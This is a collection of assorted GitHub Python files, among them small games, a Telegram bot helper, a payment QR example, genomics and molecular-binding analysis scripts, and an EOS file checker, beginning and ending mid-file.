logging.info(\"Saved interrupt\")\n try:\n sys.exit(0)\n except SystemExit:\n os._exit(0)\n","repo_name":"nathanBurg/Time-Lapse-Microscopy-Toolkit","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":11502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6750547606","text":"import time\noption = 'global'\ndef answer():\n start = time.time()\n option = input(\"enter you choice:\")\n end = time.time() - start\n endtime = round(end)\n if endtime <= 7:\n print('safe')\n else:\n print('died')\nanswer()\n\nif option <= '5':\n print('story')\nelse:\n print('no story')\n","repo_name":"Himakar5110/Mini_projects","sub_path":"Include_timing_in_quiz.py","file_name":"Include_timing_in_quiz.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10727588950","text":"import upnqr\n\ndata = upnqr.Data(\n placnik = upnqr.Placnik(\n ime='Ime Plačnika',\n ulica='Plačnikova ulica 1',\n kraj='Kraj Plačnika'),\n prejemnik = upnqr.Prejemnik(\n ime='Ime Prejemnika',\n ulica='Prejemnikova ulica 1',\n kraj='Kraj Prejemnika',\n iban='SI56043020002997963'),\n znesek = 42.00,\n koda_namena = 'COST',\n namen_placila = 'Namen plačila',\n rok_placila = '2022-05-01',\n referenca = 'SI1212345678909'\n)\n\nqr = upnqr.make_from_data(data)\nupnqr.to_pil(qr).save('out.png')\n\n#print(upnqr.to_text(qr, border=4))\n","repo_name":"shrx/upnqr","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"sl","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9033983690","text":"import json\nimport requests\nimport urllib\n\n\ntext = open(\"api.txt\", \"r\")\nTOKEN = text.readlines()[1].split(\"=\")[1].strip()\nURL = \"https://api.telegram.org/bot{}/\".format(TOKEN)\ntext.close()\n\n\ndef get_url(url):\n response = requests.get(url)\n content = response.content.decode(\"utf8\")\n return content\n\n\ndef get_json_from_url(url):\n content = get_url(url)\n js = json.loads(content)\n return js\n\n\ndef get_updates(offset=None):\n url = URL + \"getUpdates?timeout=100\"\n if offset:\n url += \"&offset={}\".format(offset)\n js = get_json_from_url(url)\n return js\n\n\ndef get_last_chat_id_and_text(updates):\n num_updates = len(updates[\"result\"])\n last_update = num_updates - 1\n text = updates[\"result\"][last_update][\"message\"][\"text\"]\n chat_id = updates[\"result\"][last_update][\"message\"][\"chat\"][\"id\"]\n return text, chat_id\n\n\ndef send_message(text, chat_id, reply_markup=None):\n text = urllib.parse.quote_plus(text)\n url = URL + \"sendMessage?text={}&chat_id={}&parse_mode=Markdown\".format(text, chat_id)\n if reply_markup:\n url += \"&reply_markup={}\".format(reply_markup)\n get_url(url)\n\n\ndef get_last_update_id(updates):\n update_ids = []\n for update in updates[\"result\"]:\n update_ids.append(int(update[\"update_id\"]))\n return max(update_ids)\n\n\ndef echo_all(updates):\n for update in updates[\"result\"]:\n try:\n text = update[\"message\"][\"text\"]\n chat = update[\"message\"][\"chat\"][\"id\"]\n send_message(text, chat)\n except Exception as e:\n print(e)\n","repo_name":"madkingaerys/telegram-chatbot","sub_path":"api_methods.py","file_name":"api_methods.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3107004473","text":"a = int(input(\"Please Enter positive number a: \")) \r\nb = int(input(\"Please Enter positive number b (a>b): \")) \r\n\r\n\r\ndef ObobshchennyjAlgorithmEvlkida(a, b):\r\n u = [a, 1, 0]\r\n v = [b, 0, 1]\r\n while v[0] != 0:\r\n q = u[0] // v[0]\r\n t = [u[0] % v[0], u[1] - q * v[1], u[2] - q * v[2]]\r\n u = v\r\n v = t\r\n return u\r\n\r\n\r\nresult = ObobshchennyjAlgorithmEvlkida(a, b)\r\ngcdAB = result[0]\r\nx = result[1]\r\ny = result[2]\r\nprint(\"The found common divisor of a and b : \" + str(gcdAB))\r\nprint(\"Found value x: \" + str(x))\r\nprint(\"Found value y: \" + str(y))\r\ninput('Press \"Enter\" to close the program')\r\n\r\n","repo_name":"Gambitos/ctf-criptom","sub_path":"Generalized Euclid algorithm.py","file_name":"Generalized Euclid algorithm.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2467995060","text":"\ndef is_acceptable(data: str) -> bool:\n acceptable_conditions = (\n len(data.split(\" \")) <= 50,\n len(data) > 1,\n len(data) <= 1000,\n data != \"[deleted]\",\n data != \"[removed]\",\n )\n return all(acceptable_conditions)\n\n\nasync def sql_insert(\n parent_id: str,\n comment_id: str,\n comment: str,\n subreddit: str,\n time_utc: int,\n score: int,\n) -> tuple:\n sql = \"\"\"\n INSERT INTO \n parent_reply (\n parent_id, \n comment_id,\n comment\n ) \n VALUES (?, ?, ?)\"\"\"\n\n return sql, (parent_id, comment_id, comment)\n\n\nasync def persist_transactions(db, sql_transactions):\n await db.execute(\"BEGIN TRANSACTION\")\n for s, p in sql_transactions:\n try:\n await db.execute(s, p)\n except Exception as e:\n print(s, p, e)\n await db.commit()\n print(f\"{len(sql_transactions)} rows affected.\")","repo_name":"pythrick/chat-bot","sub_path":"chatbot/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33018341028","text":"# pylint: disable=missing-module-docstring\nimport random\nimport string\nfrom words_file import words\n\n\ndef get_valid_word(words_list):\n \"This function choses a random and valid word from a list of words\"\n # valid word -> free from spaces and hyphens (-)\n\n random_word = random.choice(words_list)\n while ' ' in random_word or '-' in random_word :\n random_word = random.choice(words_list)\n\n return random_word\n\ndef hangman():\n \"This function implements the hangman game\"\n\n guess_word = get_valid_word(words)\n\n print(guess_word)\n\n guess_letter = set(guess_word) # transform sto a character's list\n alphabet = set(string.ascii_lowercase)\n used_letters = set() # To track which letters the user has choosed / guessed\n\n lives = 6\n\n while len(guess_letter) > 0 and lives > 0:\n print('You have used these letters : ', ' '.join(used_letters))\n current_guess = [letter if letter in used_letters else '-' for letter in guess_word ]\n print(\"Current word :\", ' '.join(current_guess))\n\n user_letter = input(f'You got {lives} lives. Guess a letter\\'s word : ').lower()\n\n if user_letter in alphabet - used_letters:\n used_letters.add(user_letter)\n if user_letter in guess_letter:\n guess_letter.remove(user_letter)\n else:\n lives = lives - 1\n print(f\"{user_letter} not in the word.\")\n\n elif user_letter in used_letters:\n print(f'You have already guessed this letter {user_letter}. Try again.')\n\n else:\n print(\"Invalid character ! Try again.\")\n\n if len(guess_letter) > 0:\n print(f'You Lost : The word was {guess_word.upper()}')\n else:\n print(f'You nailed it ! you guessed the word : {guess_word.upper()}')\n\n\nhangman()\n","repo_name":"brunoCo-de/hangman-game","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70653920088","text":"import xadmin\nfrom main import models\n\n# 自定义xadmin主题\nfrom xadmin import views\nclass GlobalSettings(object):\n \"\"\"xadmin的全局配置\"\"\"\n site_title = \"哈尔滨医科大学网站管理后台\" # 设置站点标题\n site_footer = \"哈尔滨医科大学\" # 设置站点的页脚\n menu_style = \"accordion\" # 设置菜单折叠\nxadmin.site.register(views.CommAdminView, GlobalSettings)\n# Register your models here.\nxadmin.site.register(models.NoncoRNA)\nxadmin.site.register(models.Submit)\n","repo_name":"foreversun52/ncdtc","sub_path":"main/adminx.py","file_name":"adminx.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28291174522","text":"import pandas as pd\nimport scipy.stats\nimport numpy as np\nimport sys, glob, argparse\nfrom GEA_functions import *\n\n## Here's a script to calculate the Weighted Z score (and the top-candidate test from the AdapTree data structures - i.e. those that are present in the Dryad repository)\n\nclass corLine:\n\n\tdef __init__(self, c, envIndex):\n\n\t\tdat = c.strip().split()\n\n\t\tself.contig = dat[6]\n\n\t\tself.pos = int(dat[7])\n\n## The data in the Correlations file are stored as contig-pos, so I'll parse that out\n## Note that this is VERY sensitive to the file structure staying the same\n\t\tif dat[envIndex] == \"NA\":\n\t\t\t\tself.pVal = \"NA\"\n\t\telse:\n\t\t\t\tself.pVal = float(dat[envIndex])\n\n\t\tMAF = 1 - float(dat[13])\n\n\t\tself.pbar_qbar = MAF * (1 - MAF)\n\n## A generator function to spit out the consecutive lines for the contig\ndef contigGenerator(correlationFile, envFilter):\n\n\tcurrent_contig = \"\"\n\n\tcontig_data = []\n\n\twith open( correlationFile ) as cor:\n\t\tfor c in cor:\n## Ignore the header\n\t\t\tif c.startswith(\"X.annotation\"):continue\n\n\t\t\tcurrentLine = corLine(c, envFilter)\n\n\t\t\tif currentLine.contig != current_contig:\n\n\t\t\t\tif current_contig == \"\":\n\n\t\t\t\t\tcurrent_contig = currentLine.contig\n\n\t\t\t\t\tcontig_data.append( currentLine )\n\n\t\t\t\telse:\n\n\t\t\t\t\tyield current_contig, contig_data\n\n\t\t\t\t\tcontig_data = [currentLine]\n\n\t\t\t\t\tcurrent_contig = currentLine.contig\n\n\t\t\telif currentLine.contig == current_contig:\n\n\t\t\t\tcontig_data.append( currentLine )\n\n\tyield current_contig, contig_data\n\ndef contigSnpTable(snps):\n\n\tdata_for_table = []\n\n\tfor s in snps:\n\n# \t\tgene_bool = (s.pos>=contig_dat.start)&(s.pos<=contig_dat.end)\n#\n# \t\tif sum(gene_bool) == 0:continue\n#\n# \t\tgene_name =s\":\".join(list(contig_dat.attribute[gene_bool]))\n# \t\tgene_start = list(contig_dat.start[gene_bool] )[0]\n#\n# \t\tgene_end = list( contig_dat.end[gene_bool] )[0]\n#\n# \t\tif sum(gene_bool) > 1:\n# \t\t\tprint(\"more than one gene overlapping with SNP:\", s.contig, s.pos)\n\n\t\tdata_for_table.append({\"contig\":s.contig,\n\t\t\t\t\t\t\t\t\t\"pos\":s.pos,\n#\t\t\t\t\t\t\t\t\t\"rho\":s.rho,\n\t\t\t\t\t\t\t\t\t\"pVal\":s.pVal,\n\t\t\t\t\t\t\t\t\t\"pbar_qbar\":s.pbar_qbar,\n\t\t\t\t\t\t\t\t\t\"gene\":s.contig})\n\n\treturn pd.DataFrame(data_for_table)\n\n\ndef correlationThreshold( corData, targetEnv, percentile_threshold = 99.9):\n## Make an empty container to dump the pVals into\n\tpValues = []\n\twith open( corData ) as cor:\n\t\tfor c in cor:\n\t\t\tif c.startswith(\"X.annotation\") or c.startswith(\"X_annotation\"):continue\n\t\t\tcurrentLine = corLine(c, targetEnv)\n\t\t\tif currentLine.pVal == \"NA\": continue\n\t\t\tpValues.append(currentLine.pVal)\n\tif len(pValues) == 0:\n\t\treturn None\n\telse:\n\t\treturn( 1 -np.percentile( 1 - np.array(pValues), percentile_threshold ) )\n\n\ndef main():\n\n## Define command line args\n\n\tparser = argparse.ArgumentParser(description=\"\")\n\n\tparser.add_argument(\"--correlations\", \"-c\",\n\n\t\t\trequired = True,\n\n\t\t\tdest = \"correlations\",\n\n\t\t\ttype = str,\n\n\t\t\thelp = \"The file containing the correlations\")\n\n\tparser.add_argument(\"--output\",\n\n\t\t\trequired = True,\n\n\t\t\tdest = \"output\",\n\n\t\t\ttype = str,\n\n\t\t\thelp = \"The name of the output file (the environment will be prepended to the file name so be sure to write to this dir!)\")\n\n\tparser.add_argument(\"--env\",\n\n\t\t\trequired = False,\n\n\t\t\tdest = \"env\",\n\n\t\t\ttype = str,\n\n\t\t\thelp = \"If you want to analyse just a single environment, give it here [DD_0]\",\n\n\t\t\tdefault = \"DD_0\")\n\n\tparser.add_argument(\"--empirical_p\",\n\n\t\t\trequired = False,\n\n\t\t\tdest = \"empirical_p\",\n\n\t\t\taction = \"store_true\",\n\n\t\t\thelp = \"[OPTIONAL] Give this flag if you want to analyse empirical p-values that have been appended to the dataframe\")\n\n\tparser.add_argument(\"--bay\",\n\n\t\t\trequired = False,\n\n\t\t\tdest = \"bay\",\n\n\t\t\taction = \"store_true\",\n\n\t\t\thelp = \"[OPTIONAL] Give this flag if the analysis files are BayesFactors from bayEnv.\")\n\n\targs = parser.parse_args()\n\n## For all environmental variables:\n## MAT MWMT MCMT TD MAP MSP AHM SHM DD_0 DDS NFFD bFFP FFP PAS EMT EXT Eref CMD\n\n\tadapTreeEnvs = [\"LAT\"\t,\"LONG\"\t,\"ELEVATION\"\t,\"MAT\"\t,\"MWMT\"\t,\"MCMT\"\t,\"TD\"\t,\"MAP\"\t,\"MSP\"\t,\"AHM\"\t,\"SHM\"\t,\"DD_0\"\t,\"DD5\"\t,\"NFFD\"\t,\"bFFP\"\t,\"eFFP\"\t,\"FFP\"\t,\"PAS\"\t,\"EMT\"\t,\"EXT\"\t,\"Eref\"\t,\"CMD\"\t,\"Budset_p\"\t,\"Budbreak_p\"\t,\"Height_season_1_p\"\t,\"Height_season_2_p\"\t,\"Diameter_p\"\t,\"Shoot_weight_p\"\t,\"Root_weight_p\"\t,\"Max_growth_rate_p\"\t,\"Linear_growth_days_p\"\t,\"X5_growth_complete_days_p\"\t,\"X95_growth_complete_days_p\"\t,\"X5_95_growth_days_p\"\t,\"Fall_cold_injury_p\"\t,\"Winter_cold_injury_p\"\t,\"Spring_cold_injury_p\"\t,\"root_wt_shoot_wt_p\"\t,\"root_wt_shoot_wt_p_1\"]\n\n\tadapTreeEnvDict = {}\n\n\tfor i in range(len(adapTreeEnvs)):\n\t\tadapTreeEnvDict[adapTreeEnvs[i]] = i + 32 ## to adjust for the length of the adaptree SNP table files\n\n## If you specify just a single environment (which is recommended for parallelisation)\n\tif args.env:\n## Make sure that the environment specified is actually valid\n\t\tif args.env not in adapTreeEnvs:\n\t\t\tprint(\"you did not specify a valid environment. Take a look at your command, bozo\")\n\t\t\treturn\n\t\tenvs = [args.env]\n\n## We're going to analyse each env. separately\n\tfor env in envs:\n## If you've made the file of empirical ps, only analyse the last column\n\t\tif args.empirical_p:\n\t\t\tenvIndex = -1\n\t\telse:\n\t\t\tenvIndex = adapTreeEnvDict[env]\n\t\tall_contigs = []\n\n## Now let's calculate the outlier threshold (for the TC test) from the data - Make sure it's a percentile!\n\t\tthreshold_99th = correlationThreshold( args.correlations, envIndex, percentile_threshold = 99)\n\n\t\tif threshold_99th == None:\n\t\t\tprint(\"Something went wrong when identifying the outlier threshold\")\n\t\t\treturn\n\t\tprint(\"99th percentile:\",threshold_99th)\n\n\n\t\tprint(\"Analysing:\",env)\n\n\t\tcount = 0\n\n## Iterate over contigs spat out by the contig generator\n\t\tfor contig,SNPs in contigGenerator(args.correlations, envIndex):\n\t\t\tcount += 1\n#\t\t\tif count ==100: break\n\n## Grab all the genes present on this contig\n\t\t\tcontigDF = contigSnpTable(SNPs)\n\n\t\t\tprint(contig, count)\n\n\n# Remove all NAs from the SNP set\n\t\t\tcontigDF = contigDF[contigDF[\"pVal\"]!=\"NA\"]\n## If there are no annotations on the current contig, move to the next\n\t\t\tif contigDF.shape == (0,0):\n\t\t\t\tcontinue\n\t\t\tif contigDF.shape[0] <5: continue\n## Get the average position of each annotation - not used for the analysis, just for downstream plotting\n\n\t\t\tposition = contigDF.groupby([\"gene\"])[\"pos\"].mean().to_frame()\n\n\n## Perform the WZA on the annotations in the contig\n\t\t\twza = WZA(contigDF, \"pVal\")\n## Perform the top-candidate for the annotations in the contig\n\t\t\tTopCan = top_candidate( contigDF, threshold_99th, 0.01, \"pVal\", 0.9999, MAF_filter = 0.05 )\n## Combine the results\n\t\t\tresult = pd.concat([ position, wza, TopCan] , axis = 1, sort = True ).reset_index()\n\n\t\t\tresult[\"contig\"] = contig\n\n\t\t\tresult[\"env\"] = env\n\n\t\t\tall_contigs.append( result )\n\n\t\t\tif count%1000 == 0:\n\t\t\t\tprint( count,\"contigs analysed\")\n\n\n\t\tif len( all_contigs ) == 0: continue\n\n## Combine all contig-specific dataframes into a single big one\n\t\toutputDF = pd.concat(all_contigs)\n\n## Get the expected proportion of hits per hit-bearing gene\n\t\texpected = outputDF[outputDF[\"hits\"]!=0][\"hits\"].sum() / outputDF[outputDF[\"hits\"]!=0][\"SNPs\"].sum()\n\n\t\tprint(\"expected proportion\", expected)\n\t\ttop_candidate_p = [ scipy.stats.binom_test(h, s, expected, alternative = \"greater\" ) for h, s in zip(outputDF.hits, outputDF.SNPs)]\n\n\t\toutputDF[\"top_candidate_p\"] = top_candidate_p\n#\t\toutputDF[\"top_candidate_p\"] = scipy.stats.binom_test(outputDF.hits, outputDF.SNPs, expected, alternative = \"greater\" )\n\t\texpected_hits = [ scipy.stats.binom.ppf( 0.9999 , s, expected ) for s in outputDF.SNPs]\n\n\t\toutputDF[\"expected_hits\"] = scipy.stats.binom.ppf( 0.9999 , outputDF.SNPs, expected )\n\n## Calculate the top-candidate index\n#\t\toutputDF = pd.concat(all_contigs)\n\n\n## Write the dataframe to an output file\n\t\toutputDF.to_csv(env + \"_\" + args.output,index = False)\n\n\nmain()\n","repo_name":"CoAdapTree/WZA","sub_path":"dataAnalysis/bin/WZA_AdapTree.py","file_name":"WZA_AdapTree.py","file_ext":"py","file_size_in_byte":7730,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"75087511766","text":"from collections import Callable\n\n\nclass Spec:\n \"\"\" Specs are to be used with Layer class because otherwise we have no __spec__ vars\n\n\n There is also a library called traits\n https://pypi.org/project/traits/\n\n there should be more than one lib to do this\n\n This makes a good post about api design\n https://stackoverflow.com/questions/40584140/maximum-recursion-depth-exceeded-when-using-a-class-descriptor-with-get-and-set\n \"\"\"\n\n def __init__(self, types=object, required=False, forward=False):\n self.types = types\n self.required = required\n self.forward = forward\n self.cls = None\n\n def __get__(self, instance, cls):\n print('Retrieving', self.name)\n print('obj type ', cls)\n # triggered when we retrieve the descriptor from the class directly\n if instance is None:\n print(\"none instance for \", self.name)\n return self\n try:\n return instance.__dict__[self.name]\n except KeyError:\n raise AttributeError(self.name)\n\n def __set__(self, instance, value):\n if not isinstance(value, self.types):\n raise TypeError(\"{name} has type {t}: received value of type {wrong_t}\".format(name=self.name,\n t=self.types,\n wrong_t=type(value)))\n\n print('Updating', self.name)\n instance.__dict__[self.name] = value\n\n # this let us know the name of the attribute the descriptor is assigned to\n # owner is the class object where the descriptor is defined\n # this is called when a new descriptor is created\n def __set_name__(self, cls, name):\n # print(\"the name of the attribute is \", name)\n # print(cls)\n self.name = name\n self.cls = cls\n if not hasattr(cls, \"__spec__\"):\n cls.__spec__ = set()\n\n def _spec(): return {s.name: s for s in cls.__spec__}\n\n cls._spec = _spec\n cls.__spec__.add(self)\n\n def __delete__(self, instance):\n del instance.__dict__[self.name]\n\n\nclass A:\n spec1 = Spec((int, str), required=True)\n spec2 = Spec((str, float))\n\n\nclass B(A):\n spec3 = Spec()\n\n\nclass C(A, B):\n reset = Spec(Callable)\n\n # cannot do this with functions but, that said functions\n def reset(self):\n print(\"resetting some shit\")\n\n\na = A()\nb = B()\n\na.spec1 = 3\na.spec1 = \"hello\"\n# a.spec2 = 3\n\nprint(a.__spec__)\nprint(A.__spec__)\n\nprint(\"B spec: \", B.__spec__)\nprint(B.spec3)\nprint(B.spec3.cls)\nprint(A.spec2.cls)\nprint(B.spec1.cls)\n\nprint(B._spec())\ns = B._spec()\nprint(\"spec6\" in s)\n# print(getattr(A, \"spec1\"))\n# print(getattr(a, \"spec1\"))\n# a.spec1_2 = 2\n\n# print(a.spec1_2)\n","repo_name":"davidenunes/deepsign","sub_path":"examples/descriptor_examples.py","file_name":"descriptor_examples.py","file_ext":"py","file_size_in_byte":2823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3196083820","text":"import glob, os, sys\nimport ROOT as r\nimport yaml\nimport EventProducer.common.utils as ut\n\nclass checker_eos():\n\n#__________________________________________________________\n def __init__(self, indirafs, indireos, process):\n self.process = process\n self.indirafs = indirafs\n self.indireos = indireos\n\n\n#__________________________________________________________\n def touch(self, path):\n with open(path, 'a'):\n os.utime(path, None)\n\n#__________________________________________________________\n def check(self, para):\n\n #ldir=[x[0] for x in os.walk(self.indir)]\n print(self.indireos)\n ldir=next(os.walk(self.indireos))[1]\n \n if not ut.testeos(para.eostest,para.eostest_size):\n print ('eos seems to have problems, should check, will exit')\n sys.exit(3)\n dic={}\n for l in ldir:\n if self.process!='' and self.process!=l: \n continue\n #continue if process has been checked\n if l=='BADPYTHIA' or l=='lhe' or l==\"__restored_files__\" or l==\"backup\": continue\n print ('--------------------- ',l)\n proc=l\n nfileseos=0\n if os.path.isdir('%s/%s'%(self.indireos,proc)):\n listeos = [x for x in os.listdir('%s/%s'%(self.indireos,proc)) if 'events' in x]\n nfileseos=len(listeos)\n if nfileseos==0: continue\n nfilesmerged=0\n mergefile=self.indirafs+'/'+l+'/merge.yaml'\n print(\"mergefile=\",mergefile)\n if not ut.file_exist(mergefile): \n if not ut.dir_exist('%s/%s'%(self.indirafs,proc)):\n os.system('mkdir -p %s/%s'%(self.indirafs,proc))\n self.touch('%s/%s/check'%(self.indirafs,proc))\n continue\n\n if not os.path.isdir(self.indirafs):\n os.system('mkdir %s'%self.indirafs)\n\n tmpf=None\n with open(mergefile, 'r') as stream:\n try:\n tmpf = yaml.load(stream, Loader=yaml.FullLoader)\n except yaml.YAMLError as exc:\n print(exc)\n\n bad_tot=tmpf['merge']['nbad']\n files_tot=tmpf['merge']['ndone']\n\n ntot_files=bad_tot+files_tot\n print (\"tot files \",ntot_files,\" files eos \",nfileseos)\n dic[proc]={'neos':nfileseos,'nmerged':ntot_files}\n print ('%s/%s/check'%(self.indirafs,proc))\n if ntot_filesnfileseos:\n os.system('rm %s/%s/events*.yaml'%(self.indirafs,proc))\n os.system('rm %s/%s/merge.yaml'%(self.indirafs,proc))\n else:\n if ut.file_exist('%s/%s/check'%(self.indirafs,proc)):\n os.system('rm %s/%s/check'%(self.indirafs,proc))\n \n outfile=self.indirafs+'/files.yaml'\n with open(outfile, 'w') as outyaml:\n yaml.dump(dic, outyaml, default_flow_style=False) \n \n \n","repo_name":"HEP-FCC/EventProducer","sub_path":"common/checker_eos.py","file_name":"checker_eos.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"74932090009","text":"from operator import itemgetter\r\nfrom scipy import stats\r\nfrom .global_fun import *\r\nfrom sklearn.preprocessing import minmax_scale\r\n\r\nfrom .utils.print_functions import Debuginfo\r\n\r\n\r\nclass MMGBSA:\r\n \r\n def __init__(self, total_contr_thres=0.0, stdev_contr_thres=0.0):\r\n # TOTAL_CONTRIBUTION_THRESHOLD = 0.01\r\n # STDEV_CONTRIBUTION_THRESHOLD = 0.1\r\n self.TOTAL_CONTRIBUTION_THRESHOLD = total_contr_thres\r\n self.STDEV_CONTRIBUTION_THRESHOLD = stdev_contr_thres\r\n code3 = [\"ALA\", \"ARG\", \"ASN\", \"ASP\", \"CYS\", \"GLU\", \"GLN\", \"GLY\", \"HIS\", \"ILE\", \"LEU\", \"LYS\", \"MET\", \"PHE\", \"PRO\", \"SER\", \"THR\", \"TRP\", \"TYR\", \"VAL\"]\r\n code1 = [\"A\", \"R\", \"N\", \"D\", \"C\", \"E\", \"Q\", \"G\", \"H\", \"I\", \"L\", \"K\", \"M\", \"F\", \"P\", \"S\", \"T\", \"W\", \"Y\", \"V\"]\r\n self.aa1to3_dict = dict((c1,c3) for c1,c3 in zip(code1,code3))\r\n self.aa3to1_dict = dict((c3,c1) for c3,c1 in zip(code3,code1))\r\n self.LIG_resid = None # the resid of the ligand as string\r\n self.resid2residue_dict = {}\r\n self.include_skewness = False\r\n \r\n # Just of Information purpose (never used in the code)\r\n self.headers = ['Resid 1', 'Resid 2',\r\n 'Internal mean', 'Internal stdev', 'Internal stderr',\r\n 'van der Waals mean', 'van der Waals stdev', 'van der Waals stderr',\r\n 'Electrostatic mean', 'Electrostatic stdev', 'Electrostatic stderr',\r\n 'Polar Solvation mean', 'Polar Solvation stdev', 'Polar Solvation stderr',\r\n 'Non-Polar Solv. mean', 'Non-Polar Solv. stdev', 'Non-Polar Solv. stderr',\r\n 'TOTAL mean', 'TOTAL stdev', 'TOTAL stderr']\r\n self.compound_residue_LIG_decompositionArray_mdict = tree() # only this dict has non-zero values\r\n self.perframe_compound_residue_LIG_decompositionArray_mdict = tree() # like above but with per frame decomposition\r\n \r\n @staticmethod\r\n def Ki2DeltaG(y, RT=0.5957632602, scale=False, original=False):\r\n \"\"\"\r\n Convert Ki,IC50,Kd or EC50 values to pseudoenergies. y can be a list or an array. The affinities must be in uM!\r\n :param y:\r\n :param RT:\r\n :param scale:\r\n :param original: calculate correct DeltaGs, not pseudovalues for favorable training.\r\n :return:\r\n \"\"\"\r\n from sklearn.preprocessing import minmax_scale\r\n\r\n if original:\r\n denominator = 1e6\r\n else:\r\n denominator = 1e2\r\n\r\n if type(y) == float:\r\n return RT*np.log(float(y/denominator))\r\n else:\r\n new_y = []\r\n for v in y:\r\n new_y.append(RT*np.log(float(v/denominator))) # the v must be in uM!!! ; original implementation is with v/1e6!\r\n \r\n if scale:\r\n new_y = minmax_scale(new_y, feature_range=(-1.0, 0.0)).tolist() # in this range the MLPs perform best\r\n \r\n return np.array(new_y)\r\n \r\n @staticmethod\r\n def DeltaG2Kd(y, RT=0.5957632602, scale=False, original=True):\r\n \"\"\"\r\n Convert Free Energies in Kcal/mol back to binding affinities in uM. I presume that the energies were calculated\r\n from affinities expressed in uM!\r\n :param y:\r\n :param RT:\r\n :param scale:\r\n :param original: True if the scale of the input DeltaG is in the original values. False if DeltaG was generated with\r\n Ki2DeltaG(original=False)\r\n :return :\r\n \"\"\"\r\n from sklearn.preprocessing import minmax_scale\r\n if original:\r\n exponent = 1e6\r\n else:\r\n exponent = 1e2\r\n\r\n if isinstance(y, (float, np.floating)):\r\n return np.exp(float(y)/RT)*exponent\r\n else:\r\n new_y = []\r\n for e in y:\r\n new_y.append(np.exp(float(e)/RT)*exponent) # original implementation is with *1e6\r\n \r\n if scale:\r\n new_y = minmax_scale(new_y, feature_range=(-1.0, 0.0)).tolist() # in this range the MLPs perform best\r\n \r\n return np.array(new_y)\r\n\r\n @staticmethod\r\n def KJoule2Kcal(y):\r\n \"\"\"\r\n Method to convert KJ/mol to Kcal/mol.\r\n :return:\r\n \"\"\"\r\n if type(y) in [float, int]:\r\n return y*0.238846\r\n else:\r\n return [e*0.238846 for e in y]\r\n\r\n @staticmethod\r\n def logIt(y, minus=True):\r\n \"\"\"\r\n use minus=True for Inhibitions and minus=False for Activities.\r\n \"\"\"\r\n y = np.array(y)\r\n if np.min(y) < 0: # shift the values to make them all positive\r\n y = y - np.min(y)\r\n if np.max(y) > 100:\r\n max_y = np.max(y)+1\r\n else:\r\n max_y = 101\r\n new_y = []\r\n for Inh in y:\r\n logitInh = Inh/(max_y-Inh) # convert the % inhibition values to logit\r\n new_y.append(logitInh)\r\n \r\n if minus:\r\n new_y = -1.0 * np.array(new_y)\r\n else:\r\n new_y = np.array(new_y)\r\n \r\n return new_y\r\n\r\n @staticmethod\r\n def Tm_to_DeltaG(y):\r\n \"\"\"\r\n Method that rescales Tm (or DeltaTm) to [-12, 0], which is the frequent range of deepScaffOpts score.\r\n :param y:\r\n :return:\r\n \"\"\"\r\n assert isinstance(y, (list, tuple, np.ndarray)), Debuginfo(\r\n \"ERROR: all Tm values from the same assays must be \"\r\n \"transformed to DeltaG together, not each one individually!\", fail=True)\r\n Tm = np.array(y)\r\n # return -12**(Tm/Tm.max()) ; # exponential scale\r\n return -12**(minmax_scale(Tm, feature_range=(0.7, 1.0))) ; # another exponential scale\r\n # return -1*np.exp(minmax_scale(Tm, feature_range=(0.0, 2.0)))-5 ; # yet another exponential scale\r\n # return -12*((Tm-Tm.min())/Tm.max())-6 ; # linear scale to [-12,-5]\r\n # return -5*minmax_scale(Tm)-6 ; # another linear scale to [-12,-5]\r\n\r\n @staticmethod\r\n def Tm_to_Kd(y):\r\n return MMGBSA.DeltaG2Kd(MMGBSA.Tm_to_DeltaG(y))\r\n\r\n @staticmethod\r\n def transform2FE(molname_score_dict, FE=None, Kd=None):\r\n \r\n if FE:\r\n refmolname = FE.split()[0].lower()\r\n refFE = float(FE.split()[1])\r\n elif Kd:\r\n refmolname = FE.split()[0].lower()\r\n refKd = float(FE.split()[1]) # must be in uM\r\n refFE = MMGBSA.Ki2DeltaG(refKd)\r\n \r\n refscore = molname_score_dict[refmolname]\r\n scale_factor = refFE/refscore\r\n for molname in list(molname_score_dict.keys()):\r\n molname_score_dict[molname] *= scale_factor\r\n \r\n return molname_score_dict\r\n\r\n\r\n def Inhibition2DeltaG(self, y, molnames_list, mode=1, ref_FE=None, ref_Kd=None):\r\n \"\"\"\r\n There are many ways to transform the Inhibition values.\r\n preprocessing.scale(y)\r\n preprocessing.minmax_scale(y, feature_range=(0, 1))\r\n preprocessing.maxabs_scale(y)\r\n preprocessing.robust_scale(y, with_centering=True, with_scaling=True, quantile_range=(25.0, 75.0))\r\n \"\"\"\r\n from sklearn.preprocessing import minmax_scale\r\n from sklearn.preprocessing import maxabs_scale\r\n from sklearn.preprocessing import scale\r\n from sklearn.preprocessing import robust_scale\r\n from sklearn.preprocessing import normalize\r\n from sklearn.preprocessing.data import quantile_transform\r\n \r\n y = np.array(y)\r\n if mode == 0:\r\n title, new_y = 'no transformation', y\r\n elif mode == 